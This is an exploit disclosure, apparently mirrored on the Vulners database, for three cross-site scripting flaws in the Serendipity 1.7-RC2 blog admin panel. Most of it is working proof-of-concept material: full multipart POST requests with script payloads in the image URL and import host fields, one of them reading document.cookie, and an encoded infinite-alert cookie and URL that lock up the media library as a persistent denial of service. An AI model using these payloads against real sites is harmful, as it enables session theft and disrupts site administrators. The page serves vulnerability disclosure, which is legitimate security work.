Vulners
Lucene search
SERENDIPITY-1.7-RC2 Multiple Xss Vulnerability
# Exploit Title:SERENDIPITY-1.7-RC2 MULTIPLE XSS REFLECTED,PERSISTENT AND DOS
# Category:webapps
# Date: 05-2-2013
# Exploit Author: Dshellnoi Unix
# Vendor Homepage:http://www.s9y.org/
# Software Link: http://www.s9y.org/12.html
# Version:1.7-RC2
# Tested on: Linux ubuntu bt3 r3
#risk:Medium
@DESCRIPTION
Serendipity is a PHP-powered weblog application which gives the user an easy way
to maintain an online diary, weblog or even a complete homepage. While the default
package is designed for the casual blogger, Serendipity offers a flexible,
expandable and easy-to-use framework with the power for professional applications.
#-------------SUMMARY-----------------------#
#1#-----XSS REFLECTED
#2#-----XSS REFLECTED
#3#-----XSS PERSISTENT AND DOS
#-----------------------------VULNERABIlITY DESCRIPTION 1------------------------------------#
Add media When trying to get an external image does not validate the parameter correctly
#---------------------------------- VULN CODE 1----------------------------------------------#
Content-Disposition: form-data; name="serendipity[imageurl]"\r\n
\r\n
<script>alert('XSS BY: Dshellnoi_Unix\\t JORGITO PONTE BIEN HERMANO!!!');</script>\r\n
#-------------------------XSS 1POC-EXPLOIT-------------------------------------------------#
[PATH]/serendipity/serendipity_admin.php?
SEND POST :
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[token]"\r\n
\r\n
f15b1dac25ff60dc3de4e0e740ad9cf5\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[action]"\r\n
\r\n
admin\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[adminModule]"\r\n
\r\n
images\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[adminAction]"\r\n
\r\n
add\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[imageurl]"\r\n
\r\n
<script>alert('XSS BY: Dshellnoi_Unix\\t JORGITO PONTE BIEN HERMANO!!!');</script>\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[imageimporttype]"\r\n
\r\n
image\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[target_filename][1]"\r\n
\r\n
script>\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[target_directory][1]"\r\n
\r\n
\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[column_count][1]"\r\n
\r\n
true\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[userfile][2]"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[target_filename][2]"\r\n
\r\n
script>\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[target_directory][2]"\r\n
\r\n
\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[column_count][2]"\r\n
\r\n
true\r\n
-----------------------------14611403541846138881007847563\r\n
Content-Disposition: form-data; name="serendipity[all_authors]"\r\n
\r\n
true\r\n
-----------------------------14611403541846138881007847563--\r\n
#---------------------------OUTPUT---------------------------------------#
OUTPUT: http://www.freeimagehosting.net/ohqqe
#------------------------------------------------------------------------#
#-----------------------------VULNERABIlITY DESCRIPTION 2------------------------------------#
Import data when you try to restore a backup does not properly validate the data,
allowing other reflected xss
#---------------------------------- VULN CODE 2----------------------------------------------#
Content-Disposition: form-data; name="serendipity[import][host]"\r\n
\r\n
<script>alert(document.cookie);</script>\r\n
#-------------------------XSS 2POC-EXPLOIT-------------------------------------------------#
[PATH]/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=import&serendipity%5Btoken%5D=
VALID-TOKE&serendipity%5BimportFrom%5D=b2evolution
SEND POST:
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[token]"\r\n
\r\n
f15b1dac25ff60dc3de4e0e740ad9cf5\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][host]"\r\n
\r\n
<script>alert(document.cookie);</script>\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][user]"\r\n
\r\n
[email protected]\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][pass]"\r\n
\r\n
12345678\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][name]"\r\n
\r\n
\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][charset]"\r\n
\r\n
ISO-8859-1\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][use_strtr]"\r\n
\r\n
true\r\n
-----------------------------50697544417510564181894716359\r\n
Content-Disposition: form-data; name="serendipity[import][autodiscovery]"\r\n
\r\n
false\r\n
-----------------------------50697544417510564181894716359--\r\n
#---------------------------OUTPUT 2---------------------------------------#
OUTPUT: http://www.freeimagehosting.net/2obc8
#--------------------------------------------------------------------------#
#-------------VULNERABIlITY DESCRIPTION 3 PERSISTENT AND DOS------#
Media library in the entry Filename not properly validated, allowing a "DOS"
and a persistent xss, per creating a default cookie Long Life,
To run the "DOS" persistent XSS Appearance and Manage Styles and press the Save button
#---------------------- VULN CODE 3-------------------#
NAME COOKIE :serendipity[only_filename]
VALUE COOKIE: %3Cscript%3Efor%28%3B%3B%29%7Balert%28%22BOOM+%3D%5E.%5E%3D%22%29%3B%7D%3C/script%3E
#------------------------- DOS XSS 3POC-EXPLOIT-------------------------------------------------#
[PATH]/serendipity/serendipity_admin.php?serendipity%5Btoken%5D=a0a457d81a4b6e641bddbb802b0e0ca1&serendipity%5BadminModule%5D=media&serendipity%5Baction%5D=&serendipity%5BadminAction%5D=&serendipity%5Bonly_path%5D=&serendipity%5Bonly_filename%5D=&serendipity%5Bonly_path%5D=&serendipity%5Bonly_filename%5D=%3Cscript%3Efor%28%3B%3B%29%7Balert%28%22BOOM+%3D%5E.%5E%3D%22%29%3B%7D%3C%2Fscript%3E&serendipity%5Bkeywords%5D=&serendipity%5Bfilter%5D%5Bi.date%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bi.date%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bi.name%5D=&serendipity%5Bfilter%5D%5Bi.authorid%5D=&serendipity%5Bfilter%5D%5Bi.extension%5D=&serendipity%5Bfilter%5D%5Bi.size%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bi.size%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bi.dimensions_width%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bi.dimensions_width%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bi.dimensions_height%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bi.dimensions_height%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bbp.DPI%5D=&serendipity%5Bfilter%5D%5Bbp.RUN_LENGTH%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bbp.RUN_LENGTH%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bbp.DATE%5D%5Bfrom%5D=&serendipity%5Bfilter%5D%5Bbp.DATE%5D%5Bto%5D=&serendipity%5Bfilter%5D%5Bbp.COPYRIGHT%5D=&serendipity%5Bfilter%5D%5Bbp.TITLE%5D=&serendipity%5Bfilter%5D%5Bbp.COMMENT1%5D=&serendipity%5Bfilter%5D%5Bbp.COMMENT2%5D=&serendipity%5Bfilter%5D%5Bbp.ALT%5D=&serendipity%5Bsortorder%5D%5Border%5D=i.date&serendipity%5Bsortorder%5D%5Bordermode%5D=DESC&serendipity%5Bsortorder%5D%5Bperpage%5D=8&go=+-+Go%21+-+
#---------------------------OUTPUT 3 VIDEO DEMO------------------------#
http://www.youtube.com/watch?v=qB0MxnATVvg
#--------------------------------------------------------------------------#
# 0day.today [2018-02-15] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2013 00:00Current
7High risk
Vulners AI Score7